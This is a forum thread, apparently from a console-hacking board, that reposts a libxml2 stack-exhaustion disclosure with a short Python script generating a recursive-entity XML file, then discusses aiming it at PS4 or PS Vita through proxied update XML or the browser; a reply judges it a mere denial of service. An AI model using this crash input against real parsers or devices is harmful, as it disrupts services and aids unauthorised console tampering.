Advertising (This ad goes away for registered users. You can Login or Register)

Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Underground PS4 discussions
Forum rules
Forum rule Nº 15 is strictly enforced in this subforum.
Post Reply
dragood2
Posts: 8
Joined: Tue Sep 22, 2015 5:01 am

Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by dragood2 » Wed May 04, 2016 6:05 am

Hi
This is a disclosure of the following issue that was raised a week ago
on the distro's mailing list. Both bugs on the gnome bugtracker are
currently private and should be made public now.
A couple of weeks back while working on a related bug [CVE-2016-3627] I
discovered a specially created xml file is capable of triggering a stack
overflow before libxml2 can detect its a invalid xml file.

We raised this issue upstream on 2016-04-18 and informed them that we
would place a two week embargo on the issue in case we didn't here back.
As of yet we have had no response so we have posted here.
https://bugzilla.gnome.org/show_bug.cgi?id=765207

We intend to keep the current embargo (ending May 3) unless we get
advise otherwise here. Below is a script to generate the xml file.

The functions xmlParserEntityCheck() and xmlParseAttValueComplex() used
to call xmlStringDecodeEntities() in a recursive context without incrementing the 'depth' counter in the parser context. Because of that omission, the parser
failed to detect attribute recursions in certain documents before running out
of stack space.

Hope this helps guide those that have the skill to take it further.
Advertising
Last edited by dragood2 on Thu May 05, 2016 3:45 am, edited 2 times in total.

dragood2
Posts: 8
Joined: Tue Sep 22, 2015 5:01 am

Re: Libxml2 exploit poc, possible ps4 port?

Post by dragood2 » Wed May 04, 2016 6:06 am

Script:
#!/bin/python3

f = open('repo.xml', 'w')

f.write( "<!DOCTYPE a [ ")

i = 1

while (i < 30000):
f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
i = i+1

f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")

f.close()
Advertising

wololo
Site Admin
Posts: 3616
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 exploit poc, possible ps4 port?

Post by wololo » Wed May 04, 2016 9:56 pm

Thanks.
It would be interesting to understand where the PS4 uses libxml2. I seem to recall lots of the data coming from the servers to display online information might be in xml format, wondering if it's encrypted though (in which case a proxy to serve the file for tests might not be enough). How about the browser?

Appreciate if people chime in on this one. There's a file to repro on the bugzilla link, for those too lazy to run the script from dragood2 :)
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!

lazydog2055
Posts: 1
Joined: Wed May 04, 2016 11:40 pm

Re: Libxml2 exploit poc, possible ps4 port?

Post by lazydog2055 » Thu May 05, 2016 12:02 am

looks like there was also an xml exploit in ios and osx. http://www.cvedetails.com/cve/CVE-2016-1762/

I remember with the beta firmwares sony would push a special xml to the consoles telling them to download the fw based off of some info (likely console id). With updates they also use an xml referred from a link that a proxy would be able to see. If we instead point it to the xml in question ??? Might give this a try if I can set Charles up properly. It seems too simple and wouldn't surprise me if the Web browser comes to be key.

wololo
Site Admin
Posts: 3616
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by wololo » Fri May 06, 2016 4:26 pm

Please make sure to always mention your sources when copy/pasting other people's stuff!
The source for reference: http://seclists.org/oss-sec/2016/q2/191
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!

xyz
Posts: 61
Joined: Thu Jan 20, 2011 7:06 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by xyz » Fri May 06, 2016 8:30 pm

it's useless

wololo
Site Admin
Posts: 3616
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by wololo » Fri May 06, 2016 8:43 pm

Can you detail why? Stack Protector, but besides that?
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!

xyz
Posts: 61
Joined: Thu Jan 20, 2011 7:06 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by xyz » Fri May 06, 2016 8:48 pm

It's stack exhaustion due to high recursion depth. As you can see https://access.redhat.com/security/cve/cve-2016-3705 https://access.redhat.com/security/cve/cve-2016-3627 both bugs only have availability impact, i.e. it's a DoS.

wololo
Site Admin
Posts: 3616
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by wololo » Fri May 06, 2016 8:51 pm

Thanks
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!

User avatar
Zecoxao
Posts: 281
Joined: Mon Sep 27, 2010 7:27 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by Zecoxao » Sun May 15, 2016 9:11 pm

Image
My sig is original :D

Post Reply

Return to “Programming and Security”